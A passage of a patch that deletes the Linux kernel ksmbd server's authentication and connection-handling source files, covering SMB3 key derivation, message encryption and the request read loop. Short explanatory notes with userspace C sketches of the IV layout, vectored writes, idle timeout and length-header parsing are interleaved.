+-	d->context.iov_base = "ServerIn ";
+-	d->context.iov_len = 10;
+-
+-	return generate_smb3encryptionkey(conn, sess, &twin);
+-}
+-
+-int ksmbd_gen_smb311_encryptionkey(struct ksmbd_conn *conn,
+-				   struct ksmbd_session *sess)
+-{
+-	struct derivation_twin twin;
+-	struct derivation *d;
+-
+-	d = &twin.encryption;
+-	d->label.iov_base = "SMBS2CCipherKey";
+-	d->label.iov_len = 16;
+-	d->context.iov_base = sess->Preauth_HashValue;
+-	d->context.iov_len = 64;
+-
+-	d = &twin.decryption;
+-	d->label.iov_base = "SMBC2SCipherKey";
+-	d->label.iov_len = 16;
+-	d->context.iov_base = sess->Preauth_HashValue;
+-	d->context.iov_len = 64;
+-
+-	return generate_smb3encryptionkey(conn, sess, &twin);
+-}
+-
+-int ksmbd_gen_preauth_integrity_hash(struct ksmbd_conn *conn, char *buf,
+-				     __u8 *pi_hash)
+-{
+-	int rc;
+-	struct smb2_hdr *rcv_hdr = smb2_get_msg(buf);
+-	char *all_bytes_msg = (char *)&rcv_hdr->ProtocolId;
+-	int msg_size = get_rfc1002_len(buf);
+-	struct ksmbd_crypto_ctx *ctx = NULL;
+-
+-	if (conn->preauth_info->Preauth_HashId !=
+-	    SMB2_PREAUTH_INTEGRITY_SHA512)
+-		return -EINVAL;
+-
+-	ctx = ksmbd_crypto_ctx_find_sha512();
+-	if (!ctx) {
+-		ksmbd_debug(AUTH, "could not alloc sha512\n");
+-		return -ENOMEM;
+-	}
+-
+-	rc = crypto_shash_init(CRYPTO_SHA512(ctx));
+-	if (rc) {
+-		ksmbd_debug(AUTH, "could not init shash\n");
+-		goto out;
+-	}
+-
+-	rc = crypto_shash_update(CRYPTO_SHA512(ctx), pi_hash, 64);
+-	if (rc) {
+-		ksmbd_debug(AUTH, "could not update with n\n");
+-		goto out;
+-	}
+-
+-	rc = crypto_shash_update(CRYPTO_SHA512(ctx), all_bytes_msg, msg_size);
+-	if (rc) {
+-		ksmbd_debug(AUTH, "could not update with n\n");
+-		goto out;
+-	}
+-
+-	rc = crypto_shash_final(CRYPTO_SHA512(ctx), pi_hash);
+-	if (rc) {
+-		ksmbd_debug(AUTH, "Could not generate hash err : %d\n", rc);
+-		goto out;
+-	}
+-out:
+-	ksmbd_release_crypto_ctx(ctx);
+-	return rc;
+-}
+-
+-int ksmbd_gen_sd_hash(struct ksmbd_conn *conn, char *sd_buf, int len,
+-		      __u8 *pi_hash)
+-{
+-	int rc;
+-	struct ksmbd_crypto_ctx *ctx = NULL;
+-
+-	ctx = ksmbd_crypto_ctx_find_sha256();
+-	if (!ctx) {
+-		ksmbd_debug(AUTH, "could not alloc sha256\n");
+-		return -ENOMEM;
+-	}
+-
+-	rc = crypto_shash_init(CRYPTO_SHA256(ctx));
+-	if (rc) {
+-		ksmbd_debug(AUTH, "could not init shash\n");
+-		goto out;
+-	}
+-
+-	rc = crypto_shash_update(CRYPTO_SHA256(ctx), sd_buf, len);
+-	if (rc) {
+-		ksmbd_debug(AUTH, "could not update with n\n");
+-		goto out;
+-	}
+-
+-	rc = crypto_shash_final(CRYPTO_SHA256(ctx), pi_hash);
+-	if (rc) {
+-		ksmbd_debug(AUTH, "Could not generate hash err : %d\n", rc);
+-		goto out;
+-	}
+-out:
+-	ksmbd_release_crypto_ctx(ctx);
+-	return rc;
+-}
+-
+-static int ksmbd_get_encryption_key(struct ksmbd_work *work, __u64 ses_id,
+-				    int enc, u8 *key)
+-{
+-	struct ksmbd_session *sess;
+-	u8 *ses_enc_key;
+-
+-	if (enc)
+-		sess = work->sess;
+-	else
+-		sess = ksmbd_session_lookup_all(work->conn, ses_id);
+-	if (!sess)
+-		return -EINVAL;
+-
+-	ses_enc_key = enc ? sess->smb3encryptionkey :
+-		sess->smb3decryptionkey;
+-	memcpy(key, ses_enc_key, SMB3_ENC_DEC_KEY_SIZE);
+-
+-	return 0;
+-}
+-
+-static inline void smb2_sg_set_buf(struct scatterlist *sg, const void *buf,
+-				   unsigned int buflen)
+-{
+-	void *addr;
+-
+-	if (is_vmalloc_addr(buf))
+-		addr = vmalloc_to_page(buf);
+-	else
+-		addr = virt_to_page(buf);
+-	sg_set_page(sg, addr, buflen, offset_in_page(buf));
+-}
+-
+-static struct scatterlist *ksmbd_init_sg(struct kvec *iov, unsigned int nvec,
+-					 u8 *sign)
+-{
+-	struct scatterlist *sg;
+-	unsigned int assoc_data_len = sizeof(struct smb2_transform_hdr) - 20;
+-	int i, nr_entries[3] = {0}, total_entries = 0, sg_idx = 0;
+-
+-	if (!nvec)
+-		return NULL;
+-
+-	for (i = 0; i < nvec - 1; i++) {
+-		unsigned long kaddr = (unsigned long)iov[i + 1].iov_base;
+-
+-		if (is_vmalloc_addr(iov[i + 1].iov_base)) {
+-			nr_entries[i] = ((kaddr + iov[i + 1].iov_len +
+-					PAGE_SIZE - 1) >> PAGE_SHIFT) -
+-				(kaddr >> PAGE_SHIFT);
+-		} else {
+-			nr_entries[i]++;
+-		}
+-		total_entries += nr_entries[i];
+-	}
+-
+-	/* Add two entries for transform header and signature */
+-	total_entries += 2;
+-
+-	sg = kmalloc_array(total_entries, sizeof(struct scatterlist), GFP_KERNEL);
+-	if (!sg)
+-		return NULL;
+-
+-	sg_init_table(sg, total_entries);
+-	smb2_sg_set_buf(&sg[sg_idx++], iov[0].iov_base + 24, assoc_data_len);
+-	for (i = 0; i < nvec - 1; i++) {
+-		void *data = iov[i + 1].iov_base;
+-		int len = iov[i + 1].iov_len;
+-
+-		if (is_vmalloc_addr(data)) {
+-			int j, offset = offset_in_page(data);
+-
+-			for (j = 0; j < nr_entries[i]; j++) {
+-				unsigned int bytes = PAGE_SIZE - offset;
+-
+-				if (!len)
+-					break;
+-
+-				if (bytes > len)
+-					bytes = len;
+-
+-				sg_set_page(&sg[sg_idx++],
+-					    vmalloc_to_page(data), bytes,
+-					    offset_in_page(data));
+-
+-				data += bytes;
+-				len -= bytes;
+-				offset = 0;
+-			}
+-		} else {
+-			sg_set_page(&sg[sg_idx++], virt_to_page(data), len,
+-				    offset_in_page(data));
+-		}
+-	}
+-	smb2_sg_set_buf(&sg[sg_idx], sign, SMB2_SIGNATURE_SIZE);
+-	return sg;
+-}
+-
+-int ksmbd_crypt_message(struct ksmbd_work *work, struct kvec *iov,
+-			unsigned int nvec, int enc)
+-{
+-	struct ksmbd_conn *conn = work->conn;
+-	struct smb2_transform_hdr *tr_hdr = smb2_get_msg(iov[0].iov_base);
+-	unsigned int assoc_data_len = sizeof(struct smb2_transform_hdr) - 20;
+-	int rc;
+-	struct scatterlist *sg;
+-	u8 sign[SMB2_SIGNATURE_SIZE] = {};
+-	u8 key[SMB3_ENC_DEC_KEY_SIZE];
+-	struct aead_request *req;
+-	char *iv;
+-	unsigned int iv_len;
+-	struct crypto_aead *tfm;
+-	unsigned int crypt_len = le32_to_cpu(tr_hdr->OriginalMessageSize);
+-	struct ksmbd_crypto_ctx *ctx;
+-
+-	rc = ksmbd_get_encryption_key(work,
+-				      le64_to_cpu(tr_hdr->SessionId),
+-				      enc,
+-				      key);
+-	if (rc) {
+-		pr_err("Could not get %scryption key\n", enc ? "en" : "de");
+-		return rc;
+-	}
+-
+-	if (conn->cipher_type == SMB2_ENCRYPTION_AES128_GCM ||
+-	    conn->cipher_type == SMB2_ENCRYPTION_AES256_GCM)
+-		ctx = ksmbd_crypto_ctx_find_gcm();
+-	else
+-		ctx = ksmbd_crypto_ctx_find_ccm();
+-	if (!ctx) {
+-		pr_err("crypto alloc failed\n");
+-		return -ENOMEM;
+-	}
+-
+-	if (conn->cipher_type == SMB2_ENCRYPTION_AES128_GCM ||
+-	    conn->cipher_type == SMB2_ENCRYPTION_AES256_GCM)
+-		tfm = CRYPTO_GCM(ctx);
+-	else
+-		tfm = CRYPTO_CCM(ctx);
+-
+-	if (conn->cipher_type == SMB2_ENCRYPTION_AES256_CCM ||
+-	    conn->cipher_type == SMB2_ENCRYPTION_AES256_GCM)
+-		rc = crypto_aead_setkey(tfm, key, SMB3_GCM256_CRYPTKEY_SIZE);
+-	else
+-		rc = crypto_aead_setkey(tfm, key, SMB3_GCM128_CRYPTKEY_SIZE);
+-	if (rc) {
+-		pr_err("Failed to set aead key %d\n", rc);
+-		goto free_ctx;
+-	}
+-
+-	rc = crypto_aead_setauthsize(tfm, SMB2_SIGNATURE_SIZE);
+-	if (rc) {
+-		pr_err("Failed to set authsize %d\n", rc);
+-		goto free_ctx;
+-	}
+-
+-	req = aead_request_alloc(tfm, GFP_KERNEL);
+-	if (!req) {
+-		rc = -ENOMEM;
+-		goto free_ctx;
+-	}
+-
+-	if (!enc) {
+-		memcpy(sign, &tr_hdr->Signature, SMB2_SIGNATURE_SIZE);
+-		crypt_len += SMB2_SIGNATURE_SIZE;
+-	}
+-
+-	sg = ksmbd_init_sg(iov, nvec, sign);
+-	if (!sg) {
+-		pr_err("Failed to init sg\n");
+-		rc = -ENOMEM;
+-		goto free_req;
+-	}
+-
+-	iv_len = crypto_aead_ivsize(tfm);
+-	iv = kzalloc(iv_len, GFP_KERNEL);
+-	if (!iv) {
+-		rc = -ENOMEM;
+-		goto free_sg;
+-	}
+-
+-	if (conn->cipher_type == SMB2_ENCRYPTION_AES128_GCM ||
+-	    conn->cipher_type == SMB2_ENCRYPTION_AES256_GCM) {
+-		memcpy(iv, (char *)tr_hdr->Nonce, SMB3_AES_GCM_NONCE);
+-	} else {
+-		iv[0] = 3;
+-		memcpy(iv + 1, (char *)tr_hdr->Nonce, SMB3_AES_CCM_NONCE);
+-	}
+-
+-	aead_request_set_crypt(req, sg, sg, crypt_len, iv);
+-	aead_request_set_ad(req, assoc_data_len);
+-	aead_request_set_callback(req, CRYPTO_TFM_REQ_MAY_SLEEP, NULL, NULL);
+-
+-	if (enc)
+-		rc = crypto_aead_encrypt(req);
+-	else
+-		rc = crypto_aead_decrypt(req);
+-	if (rc)
+-		goto free_iv;
+-
+-	if (enc)
+-		memcpy(&tr_hdr->Signature, sign, SMB2_SIGNATURE_SIZE);
+-
+-free_iv:
+-	kfree(iv);
+-free_sg:
+-	kfree(sg);
+-free_req:
+-	kfree(req);
+-free_ctx:
+-	ksmbd_release_crypto_ctx(ctx);
+-	return rc;
+-}
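
In the removed ksmbd_crypt_message(), the IV handed to the AEAD differs by cipher: for GCM the 12-byte nonce is the IV, while for CCM the nonce is prefixed with a flag byte of 3 (the CCM convention for a 4-byte message-length field, L' = L - 1). A hedged userspace illustration of the two layouts, a sketch rather than kernel code:

#include <stdio.h>
#include <string.h>

#define SMB3_AES_GCM_NONCE	12
#define SMB3_AES_CCM_NONCE	11

static void build_gcm_iv(unsigned char *iv, const unsigned char *nonce)
{
	memcpy(iv, nonce, SMB3_AES_GCM_NONCE);	/* the nonce is the IV */
}

static void build_ccm_iv(unsigned char *iv, const unsigned char *nonce)
{
	iv[0] = 3;	/* L' = L - 1 for a 4-byte message-length field */
	memcpy(iv + 1, nonce, SMB3_AES_CCM_NONCE);
}

int main(void)
{
	unsigned char nonce[12] = { 0xaa }, iv[16] = { 0 };

	build_gcm_iv(iv, nonce);
	build_ccm_iv(iv, nonce);
	printf("ccm flag byte: %u\n", iv[0]);
	return 0;
}
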
+diff --git a/fs/ksmbd/auth.h b/fs/ksmbd/auth.h
+deleted file mode 100644
+index 362b6159a6cff..0000000000000
+--- a/fs/ksmbd/auth.h
++++ /dev/null
+@@ -1,71 +0,0 @@
+-/* SPDX-License-Identifier: GPL-2.0-or-later */
+-/*
+- *   Copyright (C) 2018 Samsung Electronics Co., Ltd.
+- */
+-
+-#ifndef __AUTH_H__
+-#define __AUTH_H__
+-
+-#include "ntlmssp.h"
+-
+-#ifdef CONFIG_SMB_SERVER_KERBEROS5
+-#define AUTH_GSS_LENGTH		96
+-#define AUTH_GSS_PADDING	0
+-#else
+-#define AUTH_GSS_LENGTH		74
+-#define AUTH_GSS_PADDING	6
+-#endif
+-
+-#define CIFS_HMAC_MD5_HASH_SIZE	(16)
+-#define CIFS_NTHASH_SIZE	(16)
+-
+-/*
+- * Size of the ntlm client response
+- */
+-#define CIFS_AUTH_RESP_SIZE		24
+-#define CIFS_SMB1_SIGNATURE_SIZE	8
+-#define CIFS_SMB1_SESSKEY_SIZE		16
+-
+-#define KSMBD_AUTH_NTLMSSP	0x0001
+-#define KSMBD_AUTH_KRB5		0x0002
+-#define KSMBD_AUTH_MSKRB5	0x0004
+-#define KSMBD_AUTH_KRB5U2U	0x0008
+-
+-struct ksmbd_session;
+-struct ksmbd_conn;
+-struct ksmbd_work;
+-struct kvec;
+-
+-int ksmbd_crypt_message(struct ksmbd_work *work, struct kvec *iov,
+-			unsigned int nvec, int enc);
+-void ksmbd_copy_gss_neg_header(void *buf);
+-int ksmbd_auth_ntlmv2(struct ksmbd_conn *conn, struct ksmbd_session *sess,
+-		      struct ntlmv2_resp *ntlmv2, int blen, char *domain_name,
+-		      char *cryptkey);
+-int ksmbd_decode_ntlmssp_auth_blob(struct authenticate_message *authblob,
+-				   int blob_len, struct ksmbd_conn *conn,
+-				   struct ksmbd_session *sess);
+-int ksmbd_decode_ntlmssp_neg_blob(struct negotiate_message *negblob,
+-				  int blob_len, struct ksmbd_conn *conn);
+-unsigned int
+-ksmbd_build_ntlmssp_challenge_blob(struct challenge_message *chgblob,
+-				   struct ksmbd_conn *conn);
+-int ksmbd_krb5_authenticate(struct ksmbd_session *sess, char *in_blob,
+-			    int in_len,	char *out_blob, int *out_len);
+-int ksmbd_sign_smb2_pdu(struct ksmbd_conn *conn, char *key, struct kvec *iov,
+-			int n_vec, char *sig);
+-int ksmbd_sign_smb3_pdu(struct ksmbd_conn *conn, char *key, struct kvec *iov,
+-			int n_vec, char *sig);
+-int ksmbd_gen_smb30_signingkey(struct ksmbd_session *sess,
+-			       struct ksmbd_conn *conn);
+-int ksmbd_gen_smb311_signingkey(struct ksmbd_session *sess,
+-				struct ksmbd_conn *conn);
+-int ksmbd_gen_smb30_encryptionkey(struct ksmbd_conn *conn,
+-				  struct ksmbd_session *sess);
+-int ksmbd_gen_smb311_encryptionkey(struct ksmbd_conn *conn,
+-				   struct ksmbd_session *sess);
+-int ksmbd_gen_preauth_integrity_hash(struct ksmbd_conn *conn, char *buf,
+-				     __u8 *pi_hash);
+-int ksmbd_gen_sd_hash(struct ksmbd_conn *conn, char *sd_buf, int len,
+-		      __u8 *pi_hash);
+-#endif
+diff --git a/fs/ksmbd/connection.c b/fs/ksmbd/connection.c
+deleted file mode 100644
+index e1d2be19cddfa..0000000000000
+--- a/fs/ksmbd/connection.c
++++ /dev/null
+@@ -1,485 +0,0 @@
+-// SPDX-License-Identifier: GPL-2.0-or-later
+-/*
+- *   Copyright (C) 2016 Namjae Jeon <namjae.jeon@protocolfreedom.org>
+- *   Copyright (C) 2018 Samsung Electronics Co., Ltd.
+- */
+-
+-#include <linux/mutex.h>
+-#include <linux/freezer.h>
+-#include <linux/module.h>
+-
+-#include "server.h"
+-#include "smb_common.h"
+-#include "mgmt/ksmbd_ida.h"
+-#include "connection.h"
+-#include "transport_tcp.h"
+-#include "transport_rdma.h"
+-
+-static DEFINE_MUTEX(init_lock);
+-
+-static struct ksmbd_conn_ops default_conn_ops;
+-
+-LIST_HEAD(conn_list);
+-DECLARE_RWSEM(conn_list_lock);
+-
+-/**
+- * ksmbd_conn_free() - free resources of the connection instance
+- *
+- * @conn:	connection instance to be cleaned up
+- *
+- * During thread termination, the corresponding conn instance's
+- * resources (sock/memory) are released and finally the conn object is freed.
+- */
+-void ksmbd_conn_free(struct ksmbd_conn *conn)
+-{
+-	down_write(&conn_list_lock);
+-	list_del(&conn->conns_list);
+-	up_write(&conn_list_lock);
+-
+-	xa_destroy(&conn->sessions);
+-	kvfree(conn->request_buf);
+-	kfree(conn->preauth_info);
+-	kfree(conn);
+-}
+-
+-/**
+- * ksmbd_conn_alloc() - initialize a new connection instance
+- *
+- * Return:	ksmbd_conn struct on success, otherwise NULL
+- */
+-struct ksmbd_conn *ksmbd_conn_alloc(void)
+-{
+-	struct ksmbd_conn *conn;
+-
+-	conn = kzalloc(sizeof(struct ksmbd_conn), GFP_KERNEL);
+-	if (!conn)
+-		return NULL;
+-
+-	conn->need_neg = true;
+-	ksmbd_conn_set_new(conn);
+-	conn->local_nls = load_nls("utf8");
+-	if (!conn->local_nls)
+-		conn->local_nls = load_nls_default();
+-	if (IS_ENABLED(CONFIG_UNICODE))
+-		conn->um = utf8_load(UNICODE_AGE(12, 1, 0));
+-	else
+-		conn->um = ERR_PTR(-EOPNOTSUPP);
+-	if (IS_ERR(conn->um))
+-		conn->um = NULL;
+-	atomic_set(&conn->req_running, 0);
+-	atomic_set(&conn->r_count, 0);
+-	conn->total_credits = 1;
+-	conn->outstanding_credits = 0;
+-
+-	init_waitqueue_head(&conn->req_running_q);
+-	init_waitqueue_head(&conn->r_count_q);
+-	INIT_LIST_HEAD(&conn->conns_list);
+-	INIT_LIST_HEAD(&conn->requests);
+-	INIT_LIST_HEAD(&conn->async_requests);
+-	spin_lock_init(&conn->request_lock);
+-	spin_lock_init(&conn->credits_lock);
+-	ida_init(&conn->async_ida);
+-	xa_init(&conn->sessions);
+-
+-	spin_lock_init(&conn->llist_lock);
+-	INIT_LIST_HEAD(&conn->lock_list);
+-
+-	down_write(&conn_list_lock);
+-	list_add(&conn->conns_list, &conn_list);
+-	up_write(&conn_list_lock);
+-	return conn;
+-}
+-
+-bool ksmbd_conn_lookup_dialect(struct ksmbd_conn *c)
+-{
+-	struct ksmbd_conn *t;
+-	bool ret = false;
+-
+-	down_read(&conn_list_lock);
+-	list_for_each_entry(t, &conn_list, conns_list) {
+-		if (memcmp(t->ClientGUID, c->ClientGUID, SMB2_CLIENT_GUID_SIZE))
+-			continue;
+-
+-		ret = true;
+-		break;
+-	}
+-	up_read(&conn_list_lock);
+-	return ret;
+-}
+-
+-void ksmbd_conn_enqueue_request(struct ksmbd_work *work)
+-{
+-	struct ksmbd_conn *conn = work->conn;
+-	struct list_head *requests_queue = NULL;
+-
+-	if (conn->ops->get_cmd_val(work) != SMB2_CANCEL_HE) {
+-		requests_queue = &conn->requests;
+-		work->syncronous = true;
+-	}
+-
+-	if (requests_queue) {
+-		atomic_inc(&conn->req_running);
+-		spin_lock(&conn->request_lock);
+-		list_add_tail(&work->request_entry, requests_queue);
+-		spin_unlock(&conn->request_lock);
+-	}
+-}
+-
+-int ksmbd_conn_try_dequeue_request(struct ksmbd_work *work)
+-{
+-	struct ksmbd_conn *conn = work->conn;
+-	int ret = 1;
+-
+-	if (list_empty(&work->request_entry) &&
+-	    list_empty(&work->async_request_entry))
+-		return 0;
+-
+-	if (!work->multiRsp)
+-		atomic_dec(&conn->req_running);
+-	spin_lock(&conn->request_lock);
+-	if (!work->multiRsp) {
+-		list_del_init(&work->request_entry);
+-		if (work->syncronous == false)
+-			list_del_init(&work->async_request_entry);
+-		ret = 0;
+-	}
+-	spin_unlock(&conn->request_lock);
+-
+-	wake_up_all(&conn->req_running_q);
+-	return ret;
+-}
+-
+-void ksmbd_conn_lock(struct ksmbd_conn *conn)
+-{
+-	mutex_lock(&conn->srv_mutex);
+-}
+-
+-void ksmbd_conn_unlock(struct ksmbd_conn *conn)
+-{
+-	mutex_unlock(&conn->srv_mutex);
+-}
+-
+-void ksmbd_all_conn_set_status(u64 sess_id, u32 status)
+-{
+-	struct ksmbd_conn *conn;
+-
+-	down_read(&conn_list_lock);
+-	list_for_each_entry(conn, &conn_list, conns_list) {
+-		if (conn->binding || xa_load(&conn->sessions, sess_id))
+-			WRITE_ONCE(conn->status, status);
+-	}
+-	up_read(&conn_list_lock);
+-}
+-
+-void ksmbd_conn_wait_idle(struct ksmbd_conn *conn, u64 sess_id)
+-{
+-	struct ksmbd_conn *bind_conn;
+-
+-	wait_event(conn->req_running_q, atomic_read(&conn->req_running) < 2);
+-
+-	down_read(&conn_list_lock);
+-	list_for_each_entry(bind_conn, &conn_list, conns_list) {
+-		if (bind_conn == conn)
+-			continue;
+-
+-		if ((bind_conn->binding || xa_load(&bind_conn->sessions, sess_id)) &&
+-		    !ksmbd_conn_releasing(bind_conn) &&
+-		    atomic_read(&bind_conn->req_running)) {
+-			wait_event(bind_conn->req_running_q,
+-				atomic_read(&bind_conn->req_running) == 0);
+-		}
+-	}
+-	up_read(&conn_list_lock);
+-}
+-
+-int ksmbd_conn_write(struct ksmbd_work *work)
+-{
+-	struct ksmbd_conn *conn = work->conn;
+-	size_t len = 0;
+-	int sent;
+-	struct kvec iov[3];
+-	int iov_idx = 0;
+-
+-	if (!work->response_buf) {
+-		pr_err("NULL response header\n");
+-		return -EINVAL;
+-	}
+-
+-	if (work->tr_buf) {
+-		iov[iov_idx] = (struct kvec) { work->tr_buf,
+-				sizeof(struct smb2_transform_hdr) + 4 };
+-		len += iov[iov_idx++].iov_len;
+-	}
+-
+-	if (work->aux_payload_sz) {
+-		iov[iov_idx] = (struct kvec) { work->response_buf, work->resp_hdr_sz };
+-		len += iov[iov_idx++].iov_len;
+-		iov[iov_idx] = (struct kvec) { work->aux_payload_buf, work->aux_payload_sz };
+-		len += iov[iov_idx++].iov_len;
+-	} else {
+-		if (work->tr_buf)
+-			iov[iov_idx].iov_len = work->resp_hdr_sz;
+-		else
+-			iov[iov_idx].iov_len = get_rfc1002_len(work->response_buf) + 4;
+-		iov[iov_idx].iov_base = work->response_buf;
+-		len += iov[iov_idx++].iov_len;
+-	}
+-
+-	ksmbd_conn_lock(conn);
+-	sent = conn->transport->ops->writev(conn->transport, &iov[0],
+-					iov_idx, len,
+-					work->need_invalidate_rkey,
+-					work->remote_key);
+-	ksmbd_conn_unlock(conn);
+-
+-	if (sent < 0) {
+-		pr_err("Failed to send message: %d\n", sent);
+-		return sent;
+-	}
+-
+-	return 0;
+-}
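
ksmbd_conn_write() above gathers up to three kvecs (optional transform header, response header, optional aux payload) and hands them to the transport in one vectored write. A rough userspace analogue using writev(2) — a sketch, not the ksmbd transport code:

#include <stdio.h>
#include <sys/uio.h>
#include <unistd.h>

int main(void)
{
	char hdr[8] = "HDR....";		/* stand-in response header */
	char payload[5] = "DATA";		/* stand-in aux payload */
	struct iovec iov[3];
	int iov_idx = 0;
	size_t len = 0;
	ssize_t sent;

	iov[iov_idx].iov_base = hdr;
	iov[iov_idx].iov_len = sizeof(hdr);
	len += iov[iov_idx++].iov_len;

	iov[iov_idx].iov_base = payload;
	iov[iov_idx].iov_len = sizeof(payload);
	len += iov[iov_idx++].iov_len;

	/* One syscall transmits the buffers back to back, like the kvecs. */
	sent = writev(STDOUT_FILENO, iov, iov_idx);
	if (sent < 0)
		perror("writev");
	else if ((size_t)sent != len)
		fprintf(stderr, "short write: %zd of %zu\n", sent, len);
	return 0;
}
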
+-
+-int ksmbd_conn_rdma_read(struct ksmbd_conn *conn,
+-			 void *buf, unsigned int buflen,
+-			 struct smb2_buffer_desc_v1 *desc,
+-			 unsigned int desc_len)
+-{
+-	int ret = -EINVAL;
+-
+-	if (conn->transport->ops->rdma_read)
+-		ret = conn->transport->ops->rdma_read(conn->transport,
+-						      buf, buflen,
+-						      desc, desc_len);
+-	return ret;
+-}
+-
+-int ksmbd_conn_rdma_write(struct ksmbd_conn *conn,
+-			  void *buf, unsigned int buflen,
+-			  struct smb2_buffer_desc_v1 *desc,
+-			  unsigned int desc_len)
+-{
+-	int ret = -EINVAL;
+-
+-	if (conn->transport->ops->rdma_write)
+-		ret = conn->transport->ops->rdma_write(conn->transport,
+-						       buf, buflen,
+-						       desc, desc_len);
+-	return ret;
+-}
+-
+-bool ksmbd_conn_alive(struct ksmbd_conn *conn)
+-{
+-	if (!ksmbd_server_running())
+-		return false;
+-
+-	if (ksmbd_conn_exiting(conn))
+-		return false;
+-
+-	if (kthread_should_stop())
+-		return false;
+-
+-	if (atomic_read(&conn->stats.open_files_count) > 0)
+-		return true;
+-
+-	/*
+-	 * Stop the current session if the time since the last client request
+-	 * exceeds the user-configured deadtime and the open file count is
+-	 * zero.
+-	 */
+-	if (server_conf.deadtime > 0 &&
+-	    time_after(jiffies, conn->last_active + server_conf.deadtime)) {
+-		ksmbd_debug(CONN, "No response from client in %lu minutes\n",
+-			    server_conf.deadtime / SMB_ECHO_INTERVAL);
+-		return false;
+-	}
+-	return true;
+-}
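
The deadtime test in ksmbd_conn_alive() treats a connection as dead once it has been idle past the configured limit while holding no open files. A compact userspace restatement (CLOCK_MONOTONIC standing in for jiffies; the 600-second deadtime is an arbitrary example):

#include <stdbool.h>
#include <stdio.h>
#include <time.h>

static bool conn_alive(time_t last_active, time_t now,
		       unsigned int deadtime_s, int open_files)
{
	if (open_files > 0)
		return true;	/* never drop a connection with open files */
	return deadtime_s == 0 ||
	       (time_t)(now - last_active) <= (time_t)deadtime_s;
}

int main(void)
{
	struct timespec ts;

	clock_gettime(CLOCK_MONOTONIC, &ts);
	/* Idle 700 s against a 600 s deadtime with no open files: dead. */
	printf("%d\n", conn_alive(ts.tv_sec - 700, ts.tv_sec, 600, 0));
	return 0;
}
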
+-
+-#define SMB1_MIN_SUPPORTED_HEADER_SIZE (sizeof(struct smb_hdr))
+-#define SMB2_MIN_SUPPORTED_HEADER_SIZE (sizeof(struct smb2_hdr) + 4)
+-
+-/**
+- * ksmbd_conn_handler_loop() - session thread to listen on new smb requests
+- * @p:		connection instance
+- *
+- * One thread each per connection
+- *
+- * Return:	0 on success
+- */
+-int ksmbd_conn_handler_loop(void *p)
+-{
+-	struct ksmbd_conn *conn = (struct ksmbd_conn *)p;
+-	struct ksmbd_transport *t = conn->transport;
+-	unsigned int pdu_size, max_allowed_pdu_size;
+-	char hdr_buf[4] = {0,};
+-	int size;
+-
+-	mutex_init(&conn->srv_mutex);
+-	__module_get(THIS_MODULE);
+-
+-	if (t->ops->prepare && t->ops->prepare(t))
+-		goto out;
+-
+-	conn->last_active = jiffies;
+-	while (ksmbd_conn_alive(conn)) {
+-		if (try_to_freeze())
+-			continue;
+-
+-		kvfree(conn->request_buf);
+-		conn->request_buf = NULL;
+-
+-		size = t->ops->read(t, hdr_buf, sizeof(hdr_buf), -1);
+-		if (size != sizeof(hdr_buf))
+-			break;
+-
+-		pdu_size = get_rfc1002_len(hdr_buf);
+-		ksmbd_debug(CONN, "RFC1002 header %u bytes\n", pdu_size);
+-
+-		if (ksmbd_conn_good(conn))
+-			max_allowed_pdu_size =
+-				SMB3_MAX_MSGSIZE + conn->vals->max_write_size;
+-		else
+-			max_allowed_pdu_size = SMB3_MAX_MSGSIZE;
+-
+-		if (pdu_size > max_allowed_pdu_size) {
+-			pr_err_ratelimited("PDU length(%u) exceeds maximum allowed pdu size(%u) on connection(%d)\n",
+-					pdu_size, max_allowed_pdu_size,
+-					READ_ONCE(conn->status));
+-			break;
+-		}
+-
+-		/*
+-		 * Check maximum pdu size (0x00FFFFFF).
+-		 */
+-		if (pdu_size > MAX_STREAM_PROT_LEN)
+-			break;
+-
+-		if (pdu_size < SMB1_MIN_SUPPORTED_HEADER_SIZE)
+-			break;
+-
+-		/* 4 for rfc1002 length field */
+-		/* 1 for implied bcc[0] */
+-		size = pdu_size + 4 + 1;
+-		conn->request_buf = kvmalloc(size, GFP_KERNEL);
+-		if (!conn->request_buf)
+-			break;
+-
+-		memcpy(conn->request_buf, hdr_buf, sizeof(hdr_buf));
+-
+-		/*
+-		 * We already read 4 bytes to find out PDU size, now
+-		 * read in PDU
+-		 */
+-		size = t->ops->read(t, conn->request_buf + 4, pdu_size, 2);
+-		if (size < 0) {
+-			pr_err("sock_read failed: %d\n", size);
+-			break;
+-		}
+-
+-		if (size != pdu_size) {
+-			pr_err("PDU error. Read: %d, Expected: %d\n",
+-			       size, pdu_size);
+-			continue;
+-		}
+-
+-		if (!ksmbd_smb_request(conn))
+-			break;
+-
+-		if (((struct smb2_hdr *)smb2_get_msg(conn->request_buf))->ProtocolId ==
+-		    SMB2_PROTO_NUMBER) {
+-			if (pdu_size < SMB2_MIN_SUPPORTED_HEADER_SIZE)
+-				break;
+-		}
+-
+-		if (!default_conn_ops.process_fn) {
+-			pr_err("No connection request callback\n");
+-			break;
+-		}
+-
+-		if (default_conn_ops.process_fn(conn)) {
+-			pr_err("Cannot handle request\n");
+-			break;
+-		}
+-	}
+-
+-out:
+-	ksmbd_conn_set_releasing(conn);
+-	/* Wait till all references to the Server object are dropped */
+-	wait_event(conn->r_count_q, atomic_read(&conn->r_count) == 0);
+-
+-	if (IS_ENABLED(CONFIG_UNICODE))
+-		utf8_unload(conn->um);
+-	unload_nls(conn->local_nls);
+-	if (default_conn_ops.terminate_fn)
+-		default_conn_ops.terminate_fn(conn);
+-	t->ops->disconnect(t);
+-	module_put(THIS_MODULE);
+-	return 0;
+-}
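
The handler loop first reads the 4-byte RFC 1002-style header to learn the PDU length, then reads the PDU body. Assuming the usual framing (byte 0 carries type/flags, bytes 1-3 a big-endian length capped at 0x00FFFFFF — an assumption stated here, not spelled out in the patch), a standalone parser looks like this sketch:

#include <stdio.h>

static unsigned int rfc1002_len(const unsigned char hdr[4])
{
	/* bytes 1..3: big-endian payload length, at most 0x00FFFFFF */
	return ((unsigned int)hdr[1] << 16) |
	       ((unsigned int)hdr[2] << 8) |
	       (unsigned int)hdr[3];
}

int main(void)
{
	const unsigned char hdr[4] = { 0x00, 0x00, 0x01, 0x02 };

	printf("pdu size: %u\n", rfc1002_len(hdr));	/* prints 258 */
	return 0;
}
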
+-
+-void ksmbd_conn_init_server_callbacks(struct ksmbd_conn_ops *ops)
+-{
+-	default_conn_ops.process_fn = ops->process_fn;
+-	default_conn_ops.terminate_fn = ops->terminate_fn;
+-}
+-
+-int ksmbd_conn_transport_init(void)
+-{
+-	int ret;
+-
+-	mutex_lock(&init_lock);
+-	ret = ksmbd_tcp_init();
+-	if (ret) {
